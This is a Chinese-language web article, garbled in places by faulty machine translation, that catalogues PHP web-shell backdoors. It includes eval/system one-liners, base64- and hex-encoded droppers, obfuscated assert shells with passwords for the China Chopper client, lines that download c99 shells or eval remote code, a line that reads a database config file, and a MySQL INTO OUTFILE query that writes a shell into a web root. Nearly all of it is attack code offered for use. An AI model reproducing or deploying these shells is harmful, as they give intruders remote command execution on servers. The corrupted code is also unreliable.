介绍
这篇文章主要为大家展示了“PHP与SQL语句之木马的示例分析”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“PHP与SQL语句之木马的示例分析”这篇文章吧。
<强>一、基础类的一句话——功能仅限于验证漏洞了>强,实际中非常容易被查出出来:
& lt; ? php @eval ($ _GET [“code"]) ?比; & lt; ? php @system ($ _POST [“cmd"]) ?在
<强>二、编码的替换的类型:强>
& lt; ? php @fputs (fopen (base64_decode (& # 39; bG9zdC5waHA=& # 39;), w), base64_decode (& # 39; PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==& # 39;)); ?比;//会生成& lt; ? php @eval ($ _POST [& # 39; lostwolf& # 39;]); ?比; , & lt; script 语言=皃hp"祝辞@fputs (fopen (base64_decode (& # 39; bG9zdC5waHA=& # 39;), w), base64_decode (& # 39; PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==& # 39;)); & lt;/script>//php在html内部的一种嵌入方式 , & lt; ? php fputs (fopen(包(“H *“,“6 c6f7374776f6c662e706870"),“w"),包装(“H *“,“3 c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e")) ?比; , , php & lt; ? session_start (); $ _POST[& # 39;代码# 39;),,,,美元_SESSION [& # 39; theCode& # 39;],=,修剪($ _POST[& # 39;代码# 39;]); $ _SESSION [& # 39; theCode& # 39;],及preg_replace (& # 39; \ & # 39; \ & # 39; eis # 39;, & # 39; e # 39;强生# 39;v # 39;强生# 39;一个# 39;强生# 39;l # 39;强生# 39;(base64_decode ($ _SESSION [\ & # 39; theCode \ & # 39;])) & # 39;, & # 39;一个# 39;);?在
<强>三,其他类型:强>
& lt; ? php $ _GET[一]($ _GET [b]); ?比;//?=assert& b=$ {fputs 28 base64_decode % 28 fopen % % 28 yy5waha % 29日w % 29日base64_decode % 28 pd9wahagqgv2ywwojf9qt1nuw2ndktsgpz4x % 29% 29}; & lt; ? php 断言($ _REQUEST [“pass"]); ?祝辞,,,//菜刀连接,躲避检测,密码pass & lt; ? php substr (md5 ($ _REQUEST [& # 39; x # 39;]), 28)==& # 39; acd0& # 39;,, eval ($ _REQUEST[& # 39;通过# 39;]);?比;//菜刀提交,http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为,通过
<强>四,下载类型:强>
& lt; ? php echo 副本(“http://www.r57.me/c99.txt",“lostwolf.php");, ?在, & lt; ?, echo file_get_contents (“. .//cfg_database.php"); ?祝辞,//显示某文件 & lt; ?, eval (, file_get_contents(“远程shell")), ?祝辞,//运行远程壳
<强>五,无关键函数类型:强>
& lt; php ? $ _=?“; $ _ [+““]=& # 39;& # 39;; _=癬"美元霸主地位;“; $ _=($ _ [+““]|““)。($ _ [+““]|““)。($ _ [+““]^““); 比; & lt; ? php ${& # 39; _ # 39;。$ _}[& # 39; _ # 39;](${& # 39; _ # 39;。$ _}[& # 39; __ # 39;]); ?比; http://site/2.php?_=assert& __=eval ($ _POST[& # 39;通过# 39;]),密码是通过 & lt; ? $ _=啊? _ [+““]=& # 39; _ # 39;; $ _=癬"美元;!”“$ _=($ _[+““]|““)。($ _[+““]|““)。($ _[+““]^““);?在
<强>六、补充知识点:强>
SQL写一句话(MySQL):
select “& lt; ? php @system ($ _POST [“pass"]); ?在“,into outfile “/home/webaccount/projectname/www/* .php" #前面是一句话内容,后面是绝对路径www下的PHP文件,同理其他脚本也可以
以上是“PHP与SQL语句之木马的示例分析”这篇文章的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注行业资讯频道!